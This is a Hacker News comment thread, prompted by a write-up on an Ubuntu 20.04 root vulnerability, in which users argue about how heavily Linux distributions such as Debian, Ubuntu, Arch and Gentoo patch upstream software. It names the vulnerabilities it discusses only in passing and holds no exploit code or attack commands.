Hacker News new | past | comments | ask | show | jobs | submit login
How to get root on Ubuntu 20.04 by pretending nobody’s /home (securitylab.github.com)
876 points by generalizations on Nov 10, 2020 | hide | past | favorite | 278 comments



> It turns out that Ubuntu uses a modified version of accountsservice that includes some extra code that doesn’t exist in the upstream version maintained by freedesktop.

I guess next time people ask why I like a distro like Arch that doesn't insert its own junk into upstream code over Debian/Ubuntu/et al, I'll have a new example handy to cite.


As mentioned elsewhere, the worse bug was in upstream, unpatched gdm.

It's been a very long time since I worked on a distro (former Canonical employee here) but every distro carries patches of some sort.


I think there's a bit of a distinction between patches that add functionality not accepted by upstream (as here) vs the more typical distro patches which do things like replace bundled libs with shared ones, fix locations for things like TLS bundles, that sort of thing. These can still break things, but much less frequently.

I haven't been a distro packager in many years, but my recollection is that in other distros (debian, fedora, arch, etc) patches that add new functionality would generally not be considered okay unless accepted by upstream. I'd be interested to learn the rationale for not upstreaming this patch before including it.


Arch's policy is to minimize patches. I think the linux kernel runs on about 2-3 patches on average per release, most other packages aren't much more either. The policy "minimal patches & close-to-default" is in my experience usually a great one to avoid package maintainer issues.


We don't have any policy. Sticking with upstream is a shared value between the packagers but it's important to note that we generally don't enforce any policy. Most packages has no patches. Usually it's regressions or security patches if there is anything.

Current linux release has one patch changing one default: https://github.com/archlinux/linux/commits/v5.9.8-arch1


The wording on this page suggests that it is a policy:

https://wiki.archlinux.org/index.php/DeveloperWiki:Patching

As you say, the page notes that "[the] policy is intended to suggest, not to enforce", but having a policy is orthogonal to enforcing it.


And as a packager for Arch the past 3 years: I had no clue this page existed. Evidently we are bad at these policy things. But I'd rather call them social norms then packaging policies.


Even unspoken or badly specified policies can be policies. Just unwritten ones in that case. I thoroughly enjoy this one.


Or why are other packages patched? Is it because it takes long to accept them at upstream?

But why is kernel is patched by distros at all? I run kernel from kernel.org always and don't see any issues.


On arch, patches are usually done to either customize the build version (the kernel is 5.9.xy-arch1 for example, that's the only patch), or to make them build with the newer compiler and libs present on the system. Additionally any patches necessary to make them work at all, though in my experience rare.


Yup. Even Arch.


What about slackware? Its been a couple decades but I used to get my kernel source from linux direct and never had problems.


With respect to upstream patching, Slackware is similar to Arch, it has a few, but generally tries to stick to upstream. Kernel is unpatched though.


For the record, the patch (0010-set-language.patch) is not present in the accountsservice package in Debian, neither in unstable, (0.6.55-3) testing (0.6.55-3), nor stable (0.6.54.2).

https://sources.debian.org/src/accountsservice/0.6.55-3/debi...

https://sources.debian.org/src/accountsservice/0.6.45-2/debi...

The changes that fix both vulnerabilities can be viewed here: https://git.launchpad.net/ubuntu/+source/accountsservice/com...

Personally I question the logic of having accounts-daemon grovel through pam_env's config files in the first place. This isn't an API, it's an implementation detail! It just seems like a bad idea, even ignoring the vulnerability which anyone who isn't an absolute expert on the semantics of real/effective/saved UIDs & how to safely change them could have made.

https://www.usenix.org/conference/11th-usenix-security-sympo... (the famous Sendmail vulnerability therein is actually the _opposite_ of the accountsservice problem... sendmail _should_ have set the real uid as well as the effective uid, so that its effective uid could never be changed back to 0).

LWN has an excellent series of articles about thedesign of UNIX, one of which explains the problems with setuid: https://lwn.net/Articles/416494/


I don’t think it makes sense to put Debian and Ubuntu in the same group here


After the Debian SSH key bug I'd say it makes all the sense in the world.


That was twelve years ago.

Do you think equally-bad bugs haven’t made it into upstream projects directly? Hell, many downstream patches exist to fix security bugs.


> That was twelve years ago.

It was a predictable result of Debian policy, which Debian did not see fit to change. Debian still patches upstream sources including security-critical software, still does not have any dedicated security review of those patches, still leaves it up to individual maintainers to decide whether and how to clear these things with upstream, and still thinks all of this is fine.

> Do you think equally-bad bugs haven’t made it into upstream projects directly?

Honestly, I can't think of a single equally-bad bug in "normal" code, only in medical devices / industrial controllers / etc.. Cloudbleed wasn't this bad. Bumblebee deleting /usr wasn't this bad. It really was a uniquely awful bug.


> It was a predictable result of Debian policy, which Debian did not see fit to change. Debian still patches upstream sources including security-critical software, still does not have any dedicated security review of those patches, still leaves it up to individual maintainers to decide whether and how to clear these things with upstream, and still thinks all of this is fine.

It's not fine, but when the upstream authors do not regard or consider requirements of downstream projects, what can you do? like with the example of phonehome features?

arch and other distros are only possible, because for a long time, debian and other distros kept nagging the upstream authors for missing features or "nonfeatures". if debian wouldn't exist, i bet, arch had to patch much more itself.


> It's not fine, but when the upstream authors do not regard or consider requirements of downstream projects, what can you do?

Well, as one of those upstream authors whose code was patched: I was never contacted about it, so I never knew there was a requirement to be met, and so they carried around a bad patch for years, about which I knew nothing. Once a user pointed this out to me, the next release fixed the underlying issue in a better way. After years in which the Debian folks didn't file an issue or report the problem in any way that I could tell.

Mind you, Debian is not alone in this, it happens with other distros, too.

And to be fair, I think this rather depends a lot on the downstream package maintainer; I've witnessed this with other projects where they were quite good in interacting with upstream to get something sorted out. I am not really sure if any policy Debian/Fedora/... could enact would really help with it; people can (accidentally or intentionally) ignore them.


> Well, as one of those upstream authors whose code was patched: I was never contacted about it, so I never knew there was a requirement to be met, and so they carried around a bad patch for years, about which I knew nothing. Once a user pointed this out to me, the next release fixed the underlying issue in a better way. After years in which the Debian folks didn't file an issue or report the problem in any way that I could tell.

the maintainer made an error there. did you open a bugreport that you fixed it so the patch is not necessary?

> And to be fair, I think this rather depends a lot on the downstream package maintainer; I've witnessed this with other projects where they were quite good in interacting with upstream to get something sorted out. I am not really sure if any policy Debian/Fedora/... could enact would really help with it; people can (accidentally or intentionally) ignore them.

yeah and that's the point. people in this thread (not you as far as i see) say they do not trust debian because of this, but other distributors and packagers? do they have technical or organisatorial fences for avoiding such mishaps? if not, then other distributions are as problematic as debian, even arch.

debian did a whole lotta good for Free software and i really start to dislike how people shit on the project (again not you).


> other distributors and packagers? do they have technical or organisatorial fences for avoiding such mishaps?

Many distributions have a dedicated security team that has to sign off any patches to security-critical software. Debian's position is that they do not have the resources for such a team, which is fair enough, but IMO the conclusion should be that they don't have the resources to be applying their own patches to security-critical software.

More subjectively I get the sense that Debian packagers patch more aggressively and generally think the Debian way of things is better. This isn't completely groundless: there's a lot of very high quality engineering in Debian, and for a long time their package management was head and shoulders above others, especially if we're talking about C programs/libraries where upstream dependency management is very weak. But it's also made for a culture where packagers think they know better than upstream maintainers, and an approach that ends up conflicting quite a bit with newer languages where there is high-quality dependency management in the upstream builds.


> Many distributions have a dedicated security team that has to sign off any patches to security-critical software

This is false. Debian has a security team and it's way more active than most distributions.

> But it's also made for a culture where packagers think they know better than upstream maintainers

Yes and for good reasons.


> Many distributions have a dedicated security team

Which are some of those distros? (I'd consider using myself in the future)


> Well, as one of those upstream authors whose code was patched: I was never contacted about it, so I never knew there was a requirement to be met, and so they carried around a bad patch for years, about which I knew nothing.

In my experience it's rather uncommon for a DD not to contact upstream. Would you mind sharing the package name and vulnerability so I and others can learn what happened?


If we're still talking about the Debian SSH key bug in 2008, here is the Debian bug (from 2006) that led to the security issue, which was discovered in 2008: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=363516.

Upstream was contacted about it: https://marc.info/?t=114651088900003&r=1&w=2


You seem to be _almost_ implying that the packager maintainer had some sort of obligation to notify you that your software was being shipped with Debian? And also that you didn't know about it for years?

On the flip side of the coin, there are plenty of open source authors who release their work into the wild and refuse to support or even engage with downstream packagers because they see any other distribution or use of their work as Not Their Problem. And they're not really wrong, building a supportive community around a useful project is totally optional after all.

Between the constant stream of version bumps, security updates, patching, bug triaging, and user support, distribution maintenance seems to be the most thankless job in the open source world.


I agree that patching upstream sources is sometimes necessary. I think Debian is overly aggressive about it (hypocritically so in places: they will patch upstream to comply with the FHS, but won't change their own packaging to comply with the LSB). More to the point, I think patching security-critical packages needs to be treated as a special case and subject to appropriate review (as many other distributions do).


I also haven't used Debian since. No, we are not naive as to the presence of security related bugs elsewhere (e.g. Heartbleed). Just a lot of reputation was lost.

It was interesting because the cause was a patch crafted to satisfy a static analysis tool they insisted on applying to every package, which demonstrated their want to go above and beyond with respect to quality. Kudos to Debian in that regard. But a blindly applied policy, and bad judgement in disabling some cryptographic initialization code, caused a terrible bug.

I wonder if this is less of an issue today because of well defined kernel interfaces for getting "good" random numbers (i.e. cryptographically suitable). I'm sure the devil is in the details, and OpenSSH's support for unpopular systems means intentional use of uninitialized variables is still in the code base. It's all very impressive to an outsider who knows enough not to tell cryptographers how to do their job.


Which Linux distrib do you prefer?


Good question without an easy answer. I was a long-term Gentoo user but recently dumped it for NixOS. Colleagues were pushing it and so far I'm happy. Much less compiling and manual configuration which is what was driving me crazy about Gentoo. It took rather little effort to get the system in a state that feels very comfortable. But my needs have changed over time too, so this isn't strictly my opinion on what is best.

More than a decade ago a programmer friend got Ubuntu running on a second hand desktop for a rather computer illiterate arts & letters student. He was able to navigate the GUI like any other system, and it had Firefox, OpenOffice, and mplayer. I knew then that Linux is a perfectly fine desktop OS. And now we're back to using Debian of a sort. ;-)


> I also haven't used Debian since.

I stopped using Debian when its ridiculous "free" purely ideological approach to software actually caused me issues.

I needed to install Debian on a relatively old laptop a few years ago. It had all "mainstream" hardware. It's WiFi adapter was an Intel one (and a very common/popular one at the time), but it was one that wasn't open source.

How did Debian approach this? It's installer gave me a not very subtle passive aggressive message telling me that although they have the drivers for the device, it was not going to install them... because the ISO did not include them. With no working WiFi, it of course could not connect to the internet to download them! Worse still, turns out that even if it had connected to the internet it wouldn't have downloaded and installed them anyway. I found this out because I managed to use an Ethernet connection.

Completely stupid and frustrating and it felt like I was being blamed as if it was my fault.

Installed Ubuntu, included the drivers, connected to WiFi during the installation.

I have not used Debian on anything since.


The problem is that they aren't very clear about what you might be missing with the standard Debian image you get when you click the big "Getting Debian" link at the top of their homepage. I imagine that many people such as yourself were put off by the fact that they downloaded Debian and thought it was crippled out of the box.

They do provide "nonfree" install media which include firmware blobs that many people need to get their wifi up - https://cdimage.debian.org/cdimage/unofficial/non-free/cd-in.... But it's not easy to get there (I google "Debian nonfree") and it has "unofficial" in the URL which I imagine doesn't help things either.

I understand that Ubuntu is meant to be the user-friendly Debian-based distro and that Debian is meant to be Free Software first and foremost. I just wish that this nonfree install image was a bit more official and easier for users to discover.

edit: oops, I should refresh before hitting "reply" I didn't see the other answer


Kind of off-topic, but do you know why they call drivers "firmware"? I thought "firmware" was the code loaded internally in the hardware, and "driver" was the software in the OS that interacted with it (to "drive" it to do what it needs)? This confused me for a long time—I used to think "I've already updated all the firmware on all of my laptop's components, so I don't need extra bundled firmware" at some point, until I realized that's not what they talked about at all. Any idea why they call their drivers "firmware"? I feel like I might not be the only person who's been misled by this in the past.


I think your original understanding is correct - what we're calling "drivers" are run by the host OS and CPU to interact with a peripheral over PCI, USB, SPI, OWI, whatever. And "firmware" is some special software required by the device itself to run (could be some ARM or MIPS binary or whatever arch is used by CPU(s) on the device). I guess that some peripherals have firmware on non-volatile storage while others require it provided by the host when they're initialized.

So the "firmware" I required for my Thinkpad's wifi to work (and which was included in that Debian nonfree image) is this: https://wiki.debian.org/iwlwifi

update: actually on that Debian wiki there's a page called "Firmware" which explains things well https://wiki.debian.org/Firmware


Oh interesting, I didn't realize that. Thanks!


You might already know this, but there are Debian versions that address this situation: https://cdimage.debian.org/images/unofficial/non-free/images...

I like it that that try to focus on a completely free version, as that is what they stand for and why a lot of people respect them, while at the same time being realistic about the real world problems that people face.


It is funny though. Debian builds a great product with an unpopular/impractical ideology (not a judgement). Ubuntu comes along, adds a little on top, throws out the ideological constraint, and achieves great market success!

And Debian is great. We might take it for granted now, but 2 decades ago while everyone else was fiddling with their own package dependencies with RPM (pre-Yum) Debian had amazing package management with builds for all sorts of amazing architectures. They were leaders both in thought and execution.

I tried (but failed) to influence an employer to invest more in Debian; instead they went with SuSe which eventually caused a few small problems. Now Debian & Ubuntu are booming.


Somehow doesn't surprise me I've upset the neck beards


People who run Arch want this to happen.

It validates their hobby-like approach to their OS.


> People who run Arch want this to happen.

I've used Arch for the last six+ months and I don't want this to happen.

I switched as I couldn't get VFIO to work with Debian (presumably due to outdated kernel/qemu/libs). In my time with Arch I have had no problems. It has just worked and stayed out of my way. My experience with Debian is that it mostly works, but often uses much older software than one wants. Arch, in my limited experience, is an excellent distribution.


That is the "curse" of Linux I always had difficulty to understand: something does not work at all or the way I like it - switch the god-damn OS (= distro) where it works instead biting the bullet and trying to fix it. It's insane...

This is only personal observation, not direct remark to your case. I've just seen similar scenarios too many times.

On the other hand - I've played with Arch since early beginnings, but last time more than 10 years ago. Although minimal, simple and straightforward, I have never been able to grope that rolling-release core philosophy.


Could you elaborate on what you mean?


In my job we have 100+ people who run Linux as their main OS.

Most run Ubuntu or Debian, and a few run Arch. And every few weeks someone mentions again how something broke, and they need to spend some time fixing it. I think the last one was VMWare not working on a kernel yet.

Arch requires more time to maintain, and more manual maintenance. So in order to justify that extra spent time a lot of times they will bring up minor stuff that happens in Debian/Ubuntu, like this bug from 12 years ago, in order to justify running Arch, which is more of a "learn Linux" hobby.


I was bitten by the rolling release arch many times on Arch Linux ARM. The last straw was when they decided to move the configuration directory for openVPN, which meant it just failed to start up, meaning I could not SSH into it. I had to retrieve it to debug it, costing me hours of lifetime I would rather have done something else with.

I learned my lesson. From now on it is boring LTS distros only, and guix for things in userland where I want up to date things.


In my experience, the "learn Linux"-part of using Arch is the installing/setup process. Over the past three years, I have had things break perhaps three times. All of them were either my own fault (outdatet package) or warned about through Arch News (which I didn't bother to check because it is only necessary a couple of times a year)

That being said, running Arch on a computer that you need to be working at all time, might not be a good idea for professional reasons. However, I think you are essensially making a similiar argument for Arch, as they are making for the Debian bug.


> Arch requires more time to maintain, and more manual maintenance. So in order to justify that extra spent time a lot of times they will bring up minor stuff that happens in Debian/Ubuntu, like this bug from 12 years ago, in order to justify running Arch, which is more of a "learn Linux" hobby.

This is the feeling I get, and it's why I never bothered with Arch, or Gentoo before that. I started on Slackware, and while it was a great learning experience, I feel that's not a lesson I need to repeat.

Same reason for my move from RedHat (after an RPM dependency breakage) to Debian: Debian just works. It GTFO of my way and let's me focus on my code and my projects. Yes, there have been issues, no, Debian isn't "perfect", but like my preferred MUA "it sucks less than all the alternatives."


For others wondering what this was referring to: http://taint.org/2008/05/13/153959a.html

TL;DR: To silence a valgrind warning, Debian maintainers added a local patch to OpenSSL that commented out the entropy pool, making all SSL keys predictable.


More specifically, they made a valid change that silenced a valid warning, and then in a terrible mistake they found a line somewhere else that looked the same and made the same change to it too.


A lot of the Debian patches are also things like removing phone-home, expiration timers, remote code exec via autoupdate, and other upstream nonsense that shouldn’t be in packages in the first place.


Debian still likes to Debianize things too much sometimes.

Gentoo has a much better track record of keeping packages vanilla, in part because patches are kept by default in the single Portage monorepo, so there is incentive not to dump huge patchsets in there. Only a few packages have significant Gentooisms maintained out of there (like the gentoo-sources kernel patchset, which as far as kernel patchsets go is still very light, and you can opt not to use it).

In 15+ years of using Gentoo I only recall two times their patches broke something for me. One, some obsolete crud in gentoo-sources broke booting without an initramfs on HP CCISS RAID controllers (because that's the only(!) block device driver that puts its kernel device names in a subdirectory). Two, a KDE Plasma patch to pull the right system Python version from the Gentoo infrastructure that manages that forked off a subprocess, but got fork() backwards, causing the "main" process PID to change and subtly breaking D-Bus policykit stuff due to security checks on the PID (aka: you can't mount devices from the system tray when the PulseAudio volume widget was loaded, how's that for a fun one to debug).

I don't recall Gentoo ever introducing a security issue, other than perhaps typical packaging mistakes (nothing comes to mind but I assume bad permissions have happened at some point, there's always some of those).

Not a bad track record for being my main workstation OS for a decade and a half.


Yeah, IME, Debian is about the least invasive distro. Their patches tend to be a) minimal and b) only make things better.



Oof. I'd forgotten about that one. Tend to make things better, tend to. Just points out when you're doing systems level software development, how careful you must be.

Also, don't just blindly "fix things" because a tool complains. Understanding of warnings and error messages are important.


They fixed a valgrind warning by blindly removing the affected function calls? Might as well reduce every program to an empty main() to enforce correctness.



This comment sums my thoughts on that issue:

> Using uninitialized data as entropy source is an AMAZING idea in first place. “Fixing” or “unfixing” doesn’t make it any better.


uuh, no. perhaps it was initialized with zeros before. or with highly structured data. uninitialized data is not the same as external noise. i am rather glad, they think of that, it was a shame, that they oversaw this.


I disagree, what they do to Apache, nginx and especially Exim is very invasive and doesn't bring any actual benefit. They even had to write a program to modify the Exim configuration after they made it impossible to do it by hand.


Regarding Apache and nginx, you're referring to the sites/mods-enabled mechanism? Actually I really like that one compared to the "stock" way of one damn yuge httpd.conf - way more maintainable, no matter if in a Docker container creation script or in a bare-metal environment with Puppet provisioning.

Regarding exim... exim is one of a nightmare no matter how one looks at it. I hate it with a passion, no matter the distro.


Doesn't Debian sometimes go so far as to split software apart into multiple packages?

I've always thought that Fedora and Arch were both much more "upstream first" than Debian is.


Yep, had a bug very recently caused by splitting libllvm-dev and libclang-dev... guess what, libllvm-dev's CMake files depend on clang libs as they are all built together so if you only install libllvm-dev, find_package(clang) in CMake will error without any way to fix it from your code.


/me raises hand

Yes, they do. And then they complain to you that this broke something: they split our package, from the main package A they split off parts into separate packages B, C, ... that depend on A. And then complained to us that B and C had a circular dependency and that this means we had to fix something. The audacity.

Our users still sometimes report issues where I immediately ask "are you using Debian or Ubuntu?" and the answer is usually yes: because guess what, they only install A (which matches our software's name) and then they miss the functionality which Debian moved into B, C, ... We actually print a warning about this when starting the software (along the lines of "Warning, B is missing, some things may not work as expected"), which then Debian patched out, calling it "misleading".

I've never had similar issues with any other downstream Linux distro.

So, no, I really can't agree with GP's statement.


Wow, this Debian hack really makes life difficult for end users :( > We actually print a warning about this when starting the software (along the lines of "Warning, B is missing, some things may not work as expected"), which then Debian patched out, calling it "misleading". >


> Doesn't Debian sometimes go so far as to split software apart into multiple packages?

IMHO, this is the correct thing to do.

I've spent a considerable amount of time as both developer and systems adminstrator. Not quite DevOps, but I've been doing both since before that was a term.

Programmers don't often have that systems level view that is necessary for systems administration. It leads to myopia like this Ubuntu patch, and packaging is usually an afterthought to many programmers. It's that difference between a "project" and a "product."

So honestly, complaining that Debian splits things would be like complaining they don't deliver tarballs, because back before GitHub, that was how upstream "delivered" "packages" (how many people remember "tar -xzf package.tar.gz && cd package && ./configure && make"?). And before you bring up "missing files", you can do an "apt-file" to search for things and then install the associated package, assuming that it wasn't installed already as a Recommended package or in many, many cases, you are using a metapackage which contains the "full" package anyway.


Yes but see the other responses for examples of this "going wrong".

In any case, good or bad, it's invasive.


yeah, that's a good thing. because i do not need always dev-files or documentation or debug symbols on my machine.

all people are always about "slim systems" and alpine. but when debian does real engineering, then everybody complains it's complicated. that is a little bit annoying.

yes, debian is complex, but it's for a reason, since there are many requirements.


Also, removing -dev packages and compilers is one of the usual hardening steps, to make it harder for an attacker to establish a foothold and build tools.


No, that's not what I mean. Most distributions do things like splitting dev-files and debug symbols and documenation.

What I mean is taking one piece of software and splitting it apart into many libraries or binaries in a way that the upstream developer did not originally intend.

See some of the other responses.


What? Are you maybe talking about the extent of downstream patching? Because Arch Linux does insert it's own "junk" into upstream, but probably to a lesser extent than Ubuntu or maybe Debian.



Just to be clear, because it's non-obvious, Arch Linux has a single patch (not stored in .patch file however), but all things considered it's very simple.

    sed -i '/dbus_conf_dir/s/sysconfdir/datadir/g' meson.build
This likely is needed for the package to build to begin with.


I'm not sure what this supposed to demonstrate. I literally said that Arch Linux probably applies downstream patches to a lesser degree than Ubuntu. My point was that the person I responded to made it sound as if Arch Linux doesn't do any patching, which is obviously false since they have dozens if not hundreds of packages with downstream patches.


What you call "junk" in Debian are security and stability fixes.


Generally I like the patches, they tend to be sane and not get in the way. Except for the random things it does to GRUB…


if only upstream projects wouldn't be so stubborn sometimes, to accept pull requests or requirements, because downstream projects might have valid requirements.

then that would be not needed.


Yeah I hate it when distros do this.

Does Debian actually change upstream significantly? I thought they kept things fairly vanilla.

I know Fedora patched in VAAPI support on Firefox before it was merged into the Mozilla codebase. I can’t think of a worse piece of software to patch, the last thing I want to be running untested code on is my web browser.


Regarding Fedora's Firefox: The Fedora Firefox mainainers, Martin Stransky and Jan Horak, are also the main maintainers of the Linux/GTK parts of Firefox. The VAAPI patches you've mentioned are (afair) mostly-if-not-all Martin's work. So he's not applying some rando's "untested" patches.


But the patches weren’t in Firefox’s codebase, so they didn’t go through the typical Firefox QA process including the Nightly, Beta, etc process.

I’m not saying those guys don’t know what they’re doing, obviously they are experts. But I would prefer to trust but verify (not just trust).


Most of the Debian changes I've seen consist of changing default paths to match Debian's standards, backporting security changes (esp if a version bump changes functionality), and support 'conf.d' directories so packages can drop-in configuration files, and remove them easily.


> "backporting security changes (esp if a version bump changes functionality"

Thats not a trivial matter, its a potential source of many issues


It's also a source of many solutions.

There are really no perfect option here. Upstream and distro developers have different goals, and it's up to you to decide what you should adopt.


Opinion: the 'perfect solution' is to keep up with upstream and avoid backporting. It takes more work, but it reduces the separation between distro and upstream.


That's definitely not ideal for users, though.

Forced updates every 6 months is annoying to most people. Forced updates every day or so would be annoying to basically everyone.


Running Fedora since I-don't-even-remember-when (around 2008?) and I was never annoyed (unless I try to run CUDA and the like, because they rely on e.g. an ancient GCC etc.).

In particularly it was a significant improvement over the annoyances of Ubuntu, and I am still angry when thinking about the brief period I was maintaining a bunch of servers running Debian. Really unnecessarily difficult - particularly updating/upgrading and trying to clear the mess their systemd approach caused, in particular missing unit files for popular services (I think it was the isc-dhcp-server).


But this means that you are happy to upgrade all of your computer every six months or whatever Fedora's cadence is. Most people are definitely not happy to do so, because updates mean changes to stuff that works, and most people hate it when stuff that already works changes beneath them.

This is of course even worse if you are not the end-user but are trying to ship an appliance to your customers. Why would you want to update the entire appliance OS in the field fo all of your customers just to ship a security patch, instead of sticking with the same base OS on already released appliances?


Hm, let's dissect.

Upgrade schedule for Fedora is twice a year, yes. Goes by without any issues, stuff still works.

There is change and then there is change. Yes, I understand that some things don't need to change, and why do they always have to. Do I need my Desktop to still resemble 3.11 because "Why did it ever change"? - No.

Some things in life simply change and they always have. I try to keep up where change is necessary.

And if I would be shipping appliances to customers, why should I have "forced updates" of any kind outside of my control? I would never sell anything without my own repos, quality control, etc.

Do you seriously sell Debian devices to anyone and support them, if anything outside of your control breaks? I seriously don't understand the argument.

And if I ship software of any kind that relies on some libraries, I have to maintain it, of course. This includes going with the major releases.

If this is embedded hardware, where there simply are only two or three updates in its lifetime, everything is different of course, but how on earth would I then have forced updates from RedHat??


My company actually sells CentOS and Ubuntu based appliances (B2B) and we provide customers with updates (which they can choose to install or not) whenever a security problem is found. But we do NOT upgrade major versions in the field - we try to release our latest and greatest with the latest LTS release, and then provide any updates to that LTS. After the OS support period expires, we work with customers to migrate to the newer version of our entire system, instead of trying to provide further security patches.


Sounds perfectly reasonable.

Why are you afraid of updates then?


> Forced updates every 6 months is annoying to most people.

You aren't forced to update on Fedora. Fedora always supports current release n and n-1. There's even a window when n-2 is still supported after a new n is released.

Even then you aren't forced to update. I work with a guy still running Fedora 29. I wouldn't recommend that personally but his machine still works fine and is rock solid stable. Probably not the most secure though :-P


Your "perfect solution" just shifts responsibility for package maintenance (keeping up with changes) to the end user. Many people use Debian exactly because they don't want to deal with every upstream brainfart.


Eh, upstream is not always the best either. Sometimes they don't fix security issues. Sometimes upstream is very change happy and the distribution will do best by lagging behind "and see what happens".


It takes less work. Just run Debian unstable. That's exactly what it is.


Yes, but the alternative is un-patched security issues. Non-trivial but important.


No the alternative can also be to live with functionality changes.


New functionality means new bugs and breaking changes to old functionality. Sometimes the trade-off is worth it, but don't like being forced to update when it isn't.


It's the whole point of having a distribution.

If I wanted an endless stream of new vulnerabilities I can just use upstream software.


Note that "bugfixes" are most of the time considered as a functionality change.


> Does Debian actually change upstream significantly? I thought they kept things fairly vanilla.

IME, they do keep things fairly vanilla, and I speak as someone who has run Debian since . . . I wanna say 2002? Plus I've done kernel dev work, and Debian's kernel patches ain't nothing compared to what RedHat used to do.


I maintain a custom/forked driver[1] and support both Fedora/RHEL/CentOS and Ubuntu, and while Ubuntu has gotten much better, in years past I actually had to manage Ubuntu specific branches because they were so hacked up with custom patches from Canonical. I would spend more time fixing Ubuntu weirdness than I would all other distros combined. It's gotten much better the past several releases though, so thank you to Canonical for that :-)

The various RPM flavors keep their kernels vanilla enough that I can mostly just rebase on top of linux-stable, and it's been that way since I started 7 years ago (according to github).

Arch is the winner. I've never had to make a custom patch for Arch.

Disclaimer: I work for Red Hat but opinions are my own

[1]: https://github.com/FreedomBen/rtl8188ce-linux-driver


Fair enough, but I don't put Ubuntu in the same class as Debian, because while they may share many base packages in common, I do seem to remember them patching the kernel more than Debian, and usually stuff that would break my kernel dev too. Hence another reason I'm not on Ubuntu.


Agreed. On a related but different note it does seem like Debian gets (unfairly) painted with light generated by Ubuntu. I run Debian on some machines and most of the issues I have with Ubuntu are not problems on Debian (such as: Snap obsession and forcing, Abandoned/system-wrecking PPAs that are hard to recover from, etc)


> Does Debian actually change upstream significantly? I thought they kept things fairly vanilla.

No, they radically change things to match their standards. E.g. look at their tomcat package which explodes it all over the filesystem.


What is a distribution if not a collection of software that obey the same standard?

Without the latter, all you have is a burlap sack full of software. Hardly a distribution. Fine if that's what you want, but it's not what Debian is.


A distribution is by definition distributing something that already exists, so I think distributions that stick close to upstream are more in the spirit of the concept. I also think Debian's approach has shown itself to produce something less reliable on the whole. Of course if you prefer the Debian approach, knock yourself out.


For those of you that don't like that terminology: let's just use the words that Debian itself uses, namely "the universal operating system". What is an operating system if not a collection of software that follow a standard so as to interoperate?

> I also think Debian's approach has shown itself to produce something less reliable on the whole

I think the opposite. Is there something particular you'd like to point to? I accept the SSH disaster. But that's 12 years ago now, and it is a single example.


> Is there something particular you'd like to point to? I accept the SSH disaster. But that's 12 years ago now, and it is a single example.

Debian's patches to cdrecord introduced so many bugs that they eventually ended up driving the original author away from open source.

I think I remember something about the python 2 -> 3 transition being harder on Debian because of changes they've made?

The packaged Tomcat on Debian is so different that every time I've seen someone running Tomcat they've installed it manually instead.

Debian has essentially given up on packaging Hadoop. Some of their criticisms of its build process are certainly valid, but others seem to be an unreasonable expectation that everything will build exactly the way Debian expects. E.g. if I'm understanding correctly, they essentially take the position that they won't package anything built with Maven, on frankly spurious grounds.

Debian tends to end up with very outdated versions of anything from an ecosystem that uses large numbers of small libraries, or, basically, anything that isn't written in C or Perl. E.g. Python libraries are typically a long way out of date (even compared to other distributions), and Debian's package management tends to be less compatible with Python's built-in tools like pip than other distributions (e.g. Debian is more likely to rename a Python library, in my experience, which then breaks reverse-dependencies on that library or leads to having two incompatible copies of it installed). So people running Python programs on Debian tend to end up with either a difficult-to-manage mix of system and non-system dependencies, or multiple parallel installs of Python.

You could say that Debian offers a reliable platform and it's the users' fault for installing these unreliable things on top of it. But an OS exists to run applications, not the other way around, and I find that in practice Debian's approach means users are forced to step outside the managed parts of it much more than with other distributions, and it handles it less well when they do, making for setups that are less reliable in practice. Put it this way: the "add-on repository" culture is a lot stronger in Debian/Ubuntu than in other distributions, and I think that's actually a weakness rather than a strength.


> Debian's patches to cdrecord introduced so many bugs that they eventually ended up driving the original author away from open source.

That's not how I remember it. I remember distros (Debian and others) patching cdrecord, which resulted in the upstream author getting furious and re-licensing cdrecord under a non-free license to stop them. Of course the software was then forked, and the author indeed ragequit free software development. People can read more of the story here: https://en.wikipedia.org/wiki/Cdrtools#License_compatibility...

There's a reason stuff like this is named after Schilling: https://mako.cc/copyrighteous/award

> I think I remember something about the python 2 -> 3 transition being harder on Debian because of changes they've made?

No? There was no transition. 2 and 3 coexisted, 2 was recently removed.

> The packaged Tomcat on Debian is so different that every time I've seen someone running Tomcat they've installed it manually instead.

Different as in file layout?

> Debian has essentially given up on packaging Hadoop. Some of their criticisms of its build process are certainly valid, but others seem to be an unreasonable expectation that everything will build exactly the way Debian expects. E.g. if I'm understanding correctly, they essentially take the position that they won't package anything built with Maven, on frankly spurious grounds.

Hadoop is not buildable with non-bundled dependencies, as far as I understand. This violates Policy. We were discussing reliability – am I missing something here?

> Debian tends to end up with very outdated versions of anything from an ecosystem that uses large numbers of small libraries, or, basically, anything that isn't written in C or Perl. E.g. Python libraries are typically a long way out of date (even compared to other distributions),

Can you show some examples?

> and Debian's package management tends to be less compatible with Python's built-in tools like pip

This is just not true.

> than other distributions (e.g. Debian is more likely to rename a Python library, in my experience, which then breaks reverse-dependencies on that library or leads to having two incompatible copies of it installed)

The package names are often renamed, but not the Python modules.

> You could say that Debian offers a reliable platform and it's the users' fault for installing these unreliable things on top of it. But an OS exists to run applications, not the other way around

Python libraries are hardly applications.

> Put it this way: the "add-on repository" culture is a lot stronger in Debian/Ubuntu than in other distributions, and I think that's actually a weakness rather than a strength.

Add-on repos are frowned upon in Debian.


> I remember distros (Debian and others) patching cdrecord, which resulted in the upstream author getting furious and re-licensing cdrecord under a non-free license to stop them.

Right, because he was getting blamed for bugs introduced by those patches.

> Hadoop is not buildable with non-bundled dependencies, as far as I understand. This violates Policy. We were discussing reliability – am I missing something here?

Well, if you can't install programs you want to use, that's not reliable. My point is that in practice you end up with an awkward mix of system-managed and non-managed programs installed, because there's a lot that Debian is unwilling to package, and such a system becomes unreliable, particularly when those system-managed packages diverge from their upstreams.

> Python libraries are hardly applications.

No, but in the Python ecosystem it's normal for new versions of an application to require relatively up-to-date versions of a large number of small libraries. So the applications end up out very out of date. I think there was a post here not so long ago from the Debian side about how it's increasingly unsustainable to try to include programs from ecosystems with a small-library mentality in Debian.

> Add-on repos are frowned upon in Debian.

And yet I've seen far more of them being made for Debian than for other distributions.


> What is a distribution if not a collection of software that obey the same standard?

why would that definition make any sense ?


For those of you that don't like that terminology: let's just use the words that Debian itself uses, namely "the universal operating system". What is an operating system if not a collection of software that follow a standard so as to interoperate?


> What is an operating system if not a collection of software that follow a standard so as to interoperate?

I have never heard that definition of an operating system, but it seems that every university & place has its own so we're all speaking different languages anyways when using that word :-)


When you use Nix, and Nix does it, you like it when they do it, cause else they software doesn't work (Nix doesn't use default FHS).


